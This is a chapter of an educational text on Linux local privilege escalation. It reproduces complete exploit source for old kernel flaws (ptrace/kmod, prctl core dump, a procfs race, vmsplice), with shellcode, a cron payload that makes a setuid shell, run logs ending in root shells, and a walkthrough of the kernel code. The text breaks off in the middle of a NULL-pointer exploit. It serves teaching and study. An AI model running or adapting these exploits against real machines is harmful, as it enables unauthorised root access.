Next Previous Contents

12. Local root exploits

Once one has access to some machine, it is usually possible to "get root". Certainly physical access suffices - boot from a prepared boot floppy or CDROM, or, in case the BIOS and boot loader are password protected, open the case and short the BIOS battery (or replace the disk drive). (If also opening the case is impossible because of locks, then one did not really have physical access.)

But no physical actions will be required. Any system has flaws, and there will be some time between the moment they are discovered and the moment they are fixed.

12.1 A Linux example - ptrace

Let us discuss a recent Linux kernel flaw found in January and again in March 2003. The function ptrace() is used by debuggers, and allows programs like gdb to examine and change the state of a program. This function has a long history of exploits. The most recent one goes as follows.

The Linux kernel can use modules, sections of code loaded at run time - usually drivers for some hardware, or code for some type of filesystem, or some network protocol. One can load such modules by hand, but when the kmod feature was enabled at compile time, the kernel will load modules automatically when they are needed. The file /proc/sys/kernel/modprobe contains the name of the module loader - a user space program that knows where in the filesystem it should look for modules. Thus, on a kernel where kmod was not enabled:

% cat /proc/sys/kernel/modprobe
cat: /proc/sys/kernel/modprobe: No such file or directory
but on a kernel where kmod was enabled:
% cat /proc/sys/kernel/modprobe
/sbin/modprobe
(There is no real way to disable kmod, but the exploit described below will fail when one echoes /no/such/file to /proc/sys/kernel/modprobe.)

A user process can trace processes with the same user ID, but it cannot trace arbitrary processes. One will get "Permission denied" on an attempt to start tracing a setuid root program. And rightly so, for the tracer can make the tracee do anything it wants.

But now suppose some program needs a feature for which some module must be loaded. The kernel will spawn a child process /sbin/modprobe (or whatever it found in /proc/sys/kernel/modprobe), set its euid and egid to 0 and execute it.

If we can start tracing this child before euid and egid are changed, then we can insert arbitrary code into the child, let it run, and lo! we get what we want.

That is what happens in the exploit below.

/*
 * Linux kernel ptrace/kmod local root exploit
 *
 * This code exploits a race condition in kernel/kmod.c, which creates
 * kernel thread in insecure manner. This bug allows to ptrace cloned
 * process and to take control over privileged modprobe binary.
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 * 
 * I discovered this stupid bug independently on January 25, 2003, that
 * is (almost) two month before it was fixed and published by Red Hat
 * and others.
 * 
 * Wojciech Purczynski <cliph@isec.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 * 
 * (c) 2003 Copyright by iSEC Security Research
 *
 * Fixed off-by-one flaw, aeb.
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
        "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
        "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
        "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
        "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
        "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
        perror(msg);
        kill(parent, SIGKILL);
        kill(child, SIGKILL);
        kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
        char buf[MAXPATHLEN + CODE_SIZE];
        unsigned long * src;
        int i, len;

        memcpy(buf, cliphcode, CODE_SIZE);
        len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
        if (len == -1)
                fatal("[-] Unable to read /proc/self/exe");

        len += CODE_SIZE;
        buf[len++] = '\0';
        
        src = (unsigned long*) buf;
        for (i = 0; i < len; i += 4)
                if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
                        fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
        struct user_regs_struct regs;

        if (gotchild++ == 0)
                return;
        
        fprintf(stderr, "[+] Signal caught\n");

        if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
                fatal("[-] Unable to read registers");
        
        fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
        
        putcode((unsigned long *)regs.eip);

        fprintf(stderr, "[+] Now wait for suid shell...\n");

        if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
                fatal("[-] Unable to detach from victim");

        exit(0);
}

void sigalrm(int signo)
{
        errno = ECANCELED;
        fatal("[-] Fatal error");
}

void do_child(void)
{
        int err;

        child = getpid();
        victim = child + 1;

        signal(SIGCHLD, sigchld);

        do
                err = ptrace(PTRACE_ATTACH, victim, 0, 0);
        while (err == -1 && errno == ESRCH);

        if (err == -1)
                fatal("[-] Unable to attach");

        fprintf(stderr, "[+] Attached to %d\n", victim);
        while (!gotchild) ;
        if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
                fatal("[-] Unable to setup syscall trace");
        fprintf(stderr, "[+] Waiting for signal\n");

        for(;;);
}

void do_parent(char * progname)
{
        struct stat st;
        int err;
        errno = 0;
        socket(AF_SECURITY, SOCK_STREAM, 1);
        do {
                err = stat(progname, &st);
        } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
        
        if (err == -1)
                fatal("[-] Unable to stat myself");

        alarm(0);
        system(progname);
}

void prepare(void)
{
        if (geteuid() == 0) {
                initgroups("root", 0);
                setgid(0);
                setuid(0);
                execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
                fatal("[-] Unable to spawn shell");
        }
}

int main(int argc, char ** argv)
{
        prepare();
        signal(SIGALRM, sigalrm);
        alarm(10);
        
        parent = getpid();
        child = fork();
        victim = child + 1;
        
        if (child == -1)
                fatal("[-] Unable to fork");

        if (child == 0)
                do_child();
        else
                do_parent(argv[0]);

        return 0;
}

Exercise Study the above code carefully. What does this cliphcode do?

Hint: ask gdb to disassemble it. One gets

/*
 * a: syscall number
 * b, c, d: args
 * chown(path, owner, group)
 * chmod(path, mode)
 * exit(status)
 *
0x8049020 <cliphcode>:          nop
0x8049021 <cliphcode+1>:        nop
0x8049022 <cliphcode+2>:        jmp    0x8049043 <cliphcode+35>
0x8049024 <cliphcode+4>:        mov    $0xb6,%eax       / 182 = __NR_chown
0x8049029 <cliphcode+9>:        pop    %ebx             / path
0x804902a <cliphcode+10>:       xor    %ecx,%ecx        / owner 0
0x804902c <cliphcode+12>:       mov    %ecx,%edx        / group 0
0x804902e <cliphcode+14>:       int    $0x80
0x8049030 <cliphcode+16>:       mov    $0xf,%eax        / 15 = __NR_chmod
0x8049035 <cliphcode+21>:       mov    $0xded,%ecx      / mode 06755
0x804903a <cliphcode+26>:       int    $0x80
0x804903c <cliphcode+28>:       mov    %edx,%eax
0x804903e <cliphcode+30>:       mov    %edx,%ebx        / status 0
0x8049040 <cliphcode+32>:       inc    %eax             / 1 = __NR_exit
0x8049041 <cliphcode+33>:       int    $0x80
0x8049043 <cliphcode+35>:       call   0x8049024 <cliphcode+4>
0x8049048 <cliphcode+40>:
*/
where I added the comments.

Exercise The code above uses the proc filesystem. How should it be modified when proc is unavailable?

This peculiar socket call uses an unimplemented address family - in particular the kernel will not know about it and will ask whether there is a module that knows about AF_SECURITY. Typically the call will look like /sbin/modprobe -s -k net-pf-14.

I found two incarnations of this exploit on the net, km3.c by Andrzej Szombierski (anszom), and isec-ptrace-kmod-exploit.c by Wojciech Purczynski (cliph), and two derived versions, myptrace.c by snooq, and the heavily commented ptrace.c by Sed. Not all of these work for me, but I tried the above one and after fixing an off-by-one bug and realising that the reason things failed was because I tried it on an NFS mounted filesystem it gave me a root shell:

[+] Attached to 11930
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
sh-2.05# 

This problem was fixed in Linux 2.4.21.

12.2 A Linux example - prctl

Playing with core dumps is a well-known technique. The contents of the dump can be partially determined by having suitable strings in executable or environment. If an interpreter is so friendly to ignore all garbage, possibly only producing some error messages, then it can be made to execute arbitrary commands. Either dump to a predetermined file, for example via symlink, or dump in a suitable directory where all files are meaningful. Here an example of the latter, dumping to /etc/cron.d.

An exploit from July 2006.

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for approx. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
}

From man prctl:

       PR_SET_DUMPABLE (since Linux 2.3.20)
              Set  the  state  of the flag determining whether core dumps are produced for this
              process upon delivery of a signal whose default behavior is  to  produce  a  core
              dump.   (Normally  this  flag  is set for a process by default, but it is cleared
              when a set-user-ID or set-group-ID program is executed and also by various system
              calls  that  manipulate  process  UIDs and GIDs).  In kernels up to and including
              2.6.12, arg2 must be either  0  (process  is  not  dumpable)  or  1  (process  is
              dumpable).   Between  kernels  2.6.13 and 2.6.17, the value 2 was also permitted,
              which caused any binary which normally would not be dumped to be dumped  readable
              by root only; for security reasons, this feature has been removed.  (See also the
              description of /proc/sys/fs/suid_dumpable in proc(5).)
so the dump that normally would not have been permitted occurred here and gave a core file readable by root only. Fortunately cron is root and executes the contents (every minute, but the first execution already removes the core file again).

The payload could be improved. For example, many shells will drop privileges so that a suid shell doesn't work. But of course this is an entirely convincing proof-of-concept.

12.3 A Linux example - a race in procfs

A few days later: Another exploit from July 2006. Again involving PR_SET_DUMPABLE, but in an entirely different way.

/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*      h00lyshit shell code            */
__asm__ ("      __excode:       call    1f                      \n"
         "      1:              mov     $23, %eax               \n"
         "                      xor     %ebx, %ebx              \n"
         "                      int     $0x80                   \n"
         "                      pop     %eax                    \n"
         "                      mov     $cmd-1b, %ebx           \n"
         "                      add     %eax, %ebx              \n"
         "                      mov     $arg-1b, %ecx           \n"
         "                      add     %eax, %ecx              \n"
         "                      mov     %ebx, (%ecx)            \n"
         "                      mov     %ecx, %edx              \n"
         "                      add     $4, %edx                \n"
         "                      mov     $11, %eax               \n"
         "                      int     $0x80                   \n"
         "                      mov     $1, %eax                \n"
         "                      int     $0x80                   \n"
         "      arg:            .quad   0x00, 0x00              \n"
         "      cmd:            .string         \"/bin/sh\"     \n"
         "      __excode_e:     nop                             \n"
         "      .global         __excode                        \n"
         "      .global         __excode_e                      \n"
        );

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void error (char *err) {
  perror (err);
  fflush (stderr);
  exit (1);
}


/*      exploit this shit       */
void exploit (char *file) {
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i) {                  
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();   
  } else {
            nice(10);
            while (!(*c));
                sched_yield ();
      execve (t, a, e);
      error ("failed");
  }

  waitpid (i, NULL, 0);
  exit (0);
}


int main (int ac, char **av) {
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++) {
      if (!p[i]) {
          e[j++] = &p[k];
          k = i + 1;
      }
  }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}

What happens? We start with ac==2. Construct an a.out format binary in the array b[], first the header from ex, then the code from __excode. Construct an environment that is identical to the binary. The NULs that cannot be inside the strings are just the string terminators. Reexec ourselves with ac==3, and with the environment just constructed.

So far the preparation. The real stuff happens in exploit(). Make the binary file /proc/self/environ suid and executable. Set this binary to non-dumpable. Do various silly things and fork. If we are the parent, set a flag, ask to preread a large file, and set the binary to dumpable again. If we are the child, wait for the flag, and then exec this suid binary file. Bingo! or not.

The kernel, in fs/proc/base.c, has code like

proc_pid_make_inode() {
        ...
        inode->i_uid = 0;
        if (dumpable)
                inode->i_uid = task->euid;
        ...
}
If dumping core is not allowed, root is the owner of the proc files, otherwise the effective user is the owner. The first PR_SET_DUMPABLE call inhibits core dumps, so root will be the owner. But if root is the owner, then ordinary reading, needed for the exec, will fail: the read method of /proc/.../environ is proc_pid_environ(), and it will allow reading only when ptrace_may_attach() returns true, and that latter function tests the dumpable flag. Quickly change back to dumpable, namely after the file's owner has been set, and before its readabilty was denied. A race.

If we win the race then the prepared binary is executed suid root.

12.4 A Linux integer overflow - vmsplice

More recent kernels are vulnerable to the following (Feb 2008) exploit of mmap/vmsplice.

/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound     14
#define uint            unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)        (x + sizeof(x) - 40)

struct page {
        unsigned long flags;
        int count;
        int mapcount;
        unsigned long private;
        void *mapping;
        unsigned long index;
        struct { long next, prev; } lru;
};

void    exit_code();
char    exit_stack[1024 * 1024];

void    die(char *msg, int err)
{
        printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
        fflush(stdout);
        fflush(stderr);
        exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS         0x73
#define USER_SS         0x7b
#define USER_FL         0x246

static_inline
void    exit_kernel()
{
        __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
        "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        : "=r" (curr)
        : "i" (~8191)
        );
        return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS         0x23
#define USER_SS         0x2b
#define USER_FL         0x246

static_inline
void    exit_kernel()
{
        __asm__ __volatile__ (
        "swapgs ;"
        "movq %0, 0x20(%%rsp) ;"
        "movq %1, 0x18(%%rsp) ;"
        "movq %2, 0x10(%%rsp) ;"
        "movq %3, 0x08(%%rsp) ;"
        "movq %4, 0x00(%%rsp) ;"
        "iretq"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
        "movq %%gs:(0), %0"
        : "=r" (curr)
        );
        return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
        long, _vmsplice,
        int, fd,
        struct iovec *, iov,
        unsigned long, nr_segs,
        unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void    kernel_code()
{
        int     i;
        uint    *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }       

        exit_kernel();
}

void    exit_code()
{
        if (getuid() != 0)
                die("wtf", 0);

        printf("[+] root\n");
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        die("/bin/bash", errno);
}

int     main(int argc, char *argv[])
{
        int             pi[2];
        size_t          map_size;
        char *          map_addr;
        struct iovec    iov;
        struct page *   pages[5];

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        printf("-----------------------------------\n");
        printf(" Linux vmsplice Local Root Exploit\n");
        printf(" By qaaz\n");
        printf("-----------------------------------\n");

        if (!uid || !gid)
                die("!@#$", 0);

        /*****/
        pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
        pages[1] = pages[0] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[0]);
        printf("[+] page: 0x%lx\n", pages[1]);

        pages[0]->flags    = 1 << PG_compound;
        pages[0]->private  = (unsigned long) pages[0];
        pages[0]->count    = 1;
        pages[1]->lru.next = (long) kernel_code;

        /*****/
        pages[2] = *(void **) pages[0];
        pages[3] = pages[2] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[2]);
        printf("[+] page: 0x%lx\n", pages[3]);

        pages[2]->flags    = 1 << PG_compound;
        pages[2]->private  = (unsigned long) pages[2];
        pages[2]->count    = 1;
        pages[3]->lru.next = (long) kernel_code;

        /*****/
        pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
        map_size = PAGE_SIZE;
        map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);
        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[4]);

        /*****/
        map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
        map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

        /*****/
        map_size -= 2 * PAGE_SIZE;
        if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
                die("munmap", errno);

        /*****/
        if (pipe(pi) < 0) die("pipe", errno);
        close(pi[0]);

        iov.iov_base = map_addr;
        iov.iov_len  = ULONG_MAX;

        signal(SIGPIPE, exit_code);
        _vmsplice(pi[1], &iov, 1, 0);
        die("vmsplice", errno);
        return 0;
}

Remains the question what this does, and why it works.

In main() we have an array pages of pointers to a struct page. We first do (on a 32-bit machine; otherwise 64-bit addresses are written in page[0] and page[4], with 0 in one half and 4096 in the other half)

        pages[0] = 0;
        pages[1] = 32;
        pages[2] = 16384;
        pages[3] = 16416;
        pages[4] = 4096;
Here 32 is sizeof(struct page) and 16384 is 1<<PG_compound and 4096 is PAGE_SIZE. One page of memory (4096 bytes) is mapped at each of the three fixed addresses 0 and 16384 and 4096. And 50 pages of memory are mapped at some arbitrary place P (PIPE_BUFFERS is 16), and the 49th page is unmapped again. A pipe is created, its reading end is closed. We set the signal routine that must be called when we get the SIGPIPE signal (for writing to a pipe without readers). Now we do vmsplice() on its writing end. This maps the memory area starting at P and with length ULONG_MAX into the (writing end of) a pipe. Ha! An integer overflow bug in the kernel. It fails to see that ULONG_MAX is more than fits.

But now, what happens? Let me read 2.6.24 code. We start with sys_vmsplice() in fs/splice.c. It calls vmsplice_to_pipe(), which calls get_iovec_page_array() and there

        int buffers = 0;

        base = entry.iov_base;
        len = entry.iov_len;
        off = (unsigned long) base & ~PAGE_MASK;
        npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
        if (npages > PIPE_BUFFERS - buffers)
                npages = PIPE_BUFFERS - buffers;
(so off = 0, len = -1, npages = 0, and the last two lines, designed to test for overflow, do not notice anything). Now we fetch these 0 pages:
        error = get_user_pages(current, current->mm, base, npages, 0, 0,
                               &pages[buffers], NULL);
This function lives in mm/memory.c and is a big
        do {
                ...
                if (!vma)
                        return i ? : -EFAULT;
                ...
                pages[i] = page;
                ...
                i++;
                start += PAGE_SIZE;
                len--;
        } while (len && start < vma->vm_end);
loop, where len is the npages parameter. Since that was 0, this loop never finishes by completing the copy of the required number of pages - instead it finishes when it reaches the end of the mapped area, after 48 pages, overflowing the pages[] array. So, the stack of vmsplice_to_pipe() is corrupted.

When get_user_pages() returns, get_iovec_page_array() also fills the array partial, also overflowing that:

                for (i = 0; i < error; i++) {
                        const int plen = min(len, PAGE_SIZE);

                        partial[buffers].offset = 0;
                        partial[buffers].len = plen;
                        len -= plen;
                        buffers++;
                }
Here error is the return value of get_user_pages(), the number of user pages gotten, 48, and partial is an array of structs
struct partial_page {
        unsigned int offset;
        unsigned int len;
        unsigned long private;
};
filled with a repeated (0, 4096, ?). This overflows the array partial and thereafter also the array pages:
static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,
                             unsigned long nr_segs, unsigned int flags)
{
        struct pipe_inode_info *pipe;
        struct page *pages[PIPE_BUFFERS];
        struct partial_page partial[PIPE_BUFFERS];
        struct splice_pipe_desc spd = {
                .pages = pages,
                .partial = partial,
                .flags = flags,
                .ops = &user_page_pipe_buf_ops,
        };
        ...
        get_iovec_page_array(iov, nr_segs, pages, partial,
                             flags & SPLICE_F_GIFT);
        ...
        return splice_to_pipe(pipe, &spd);
}

Now splice_to_pipe() is called. We read

        for (;;) {
                if (!pipe->readers) {
                        send_sig(SIGPIPE, current, 0);
                        break;
                }
                ...
        }
        while (page_nr < spd_pages)
                page_cache_release(spd->pages[page_nr++]);

There are no readers since we closed the reading end, and a signal is generated. The get_user_pages() had done follow_page() which does a get_page() which does atomic_inc(&page->_count). Now a release is done for all pages involved and the function put_page() (in mm/swap.c) is called on each. But the page struct pointers were overwritten with 0 and 4096, so the kernel looks there, that is, in user memory instead of kernel memory. The mmap calls have prepared some memory there containing valid-looking page structs, and these have the "compound page" bit set. Consequently, the put_compound_page() routine is called, and

static void put_compound_page(struct page *page)
{
        page = compound_head(page);
        if (put_page_testzero(page)) {
                compound_page_dtor *dtor;

                dtor = get_compound_page_dtor(page);
                (*dtor)(page);
        }
}
it finds the destructor routine address in the compound page struct, and calls that. Aha.

Our routine kernel_code() is called, it finds the place in the kernel where uid and gid are stored (that is why the exploit starts testing whether we are root already - there are too many places that contain 0), and stores 0 there. The pointer current points at the current task_struct (defined in <linux/sched.h>) which has

        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
        struct group_info *group_info;
        kernel_cap_t   cap_effective, cap_inheritable, cap_permitted;
        unsigned keep_capabilities:1;
and we see that the final assignments in kernel_code() give the process all capabilities. Now we return and start a root shell.
% ./qaaz
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40158000 .. 0x4018a000
[+] root
#

Yes, it works (on plain 2.6.24).

12.5 A Linux NULL pointer exploit

The kernel uses operations structures everywhere, so that if we have to do foo() on an object x, the kernel does x->ops->foo(). If one is a careful programmer and prefers robust code, one would write

        if (x->ops && x->ops->foo)
                x->ops->foo();
and indeed, this occurs all over the place in Linus' original code. That is local correctness: one sees at the call site that the pointer is non-NULL. Over time, the kernel source has moved in the direction of global correctness (only): after reading the entire kernel source one sees that x->ops->foo is never NULL, so that the test is superfluous, and deletes the test. Of course this leads to fragile code, difficult to maintain.

If one makes a mistake, and one always does, the direct result would be a call of a function at address 0, probably followed by a kernel crash. This can be exploited as a DoS. It becomes a local root exploit if it is possible to map address 0 in user space and put suitable code there. Below an example that works on my machine (August 2009).

First the code that starts the exploit:

#include <sys/personality.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
        if (personality(PER_SVR4) < 0) {
                perror("personality");
                return -1;
        }

        fprintf(stderr, "padlina z lublina!\n");

        execl("./exploit", "exploit", 0);
}
and then the actual exploit (for an i386):
/*
 * 14.08.2009, babcia padlina
 *
 * vulnerability discovered by google security team
 *
 * some parts of exploit code borrowed from vmsplice exploit by qaaz
 * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy:
 *     http://xorl.wordpress.com/2009/07/16/cve-2009-1895-
linux-kernel-per_clear_on_setid-personality-bypass/
 */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/personality.h>

static unsigned int uid, gid;

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
#define STACK(x) (x + sizeof(x) - 40)

void exit_code();
char exit_stack[1024 * 1024];

static inline __attribute__((always_inline)) void *get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
                "movl %%esp, %%eax ;"
                "andl %1, %%eax ;"
                "movl (%%eax), %0"
                : "=r" (curr)
                : "i" (~8191)
        );
        return (void *) curr;
}

static inline __attribute__((always_inline)) void exit_kernel()
{
        __asm__ __volatile__ (
                "movl %0, 0x10(%%esp) ;"
                "movl %1, 0x0c(%%esp) ;"
                "movl %2, 0x08(%%esp) ;"
